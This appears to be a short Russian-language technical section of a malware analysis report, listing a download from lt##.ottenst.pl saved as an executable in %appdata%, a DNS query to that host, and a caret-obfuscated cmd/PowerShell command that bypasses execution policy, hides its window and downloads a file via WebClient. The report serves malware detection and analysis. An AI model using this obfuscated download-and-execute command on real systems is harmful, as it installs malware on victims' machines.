Техническая информация
- http://lt##.ottenst.pl/file/hen.bhj как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^E^rsHElL^.^E^Xe^ ^-ExECUtiO^N^P^oLIcy ^by^p^a^S^S -N^OPR^o^file -WIN^doWs^Tyl^e ^HI^D^deN^ (^NE^w-obJ^EcT^ ^SYstEm.nEt.^WeBC^l^ient^)^.d^ow^NL^oADfI^L^E^('http...
- DNS ASK lt##.ottenst.pl
- '<SYSTEM32>\cmd.exe' /C "pow^E^rsHElL^.^E^Xe^ ^-ExECUtiO^N^P^oLIcy ^by^p^a^S^S -N^OPR^o^file -WIN^doWs^Tyl^e ^HI^D^deN^ (^NE^w-obJ^EcT^ ^SYstEm.nEt.^WeBC^l^ient^)^.d^ow^NL^oADfI^L^E^('http...' (со скрытым окном)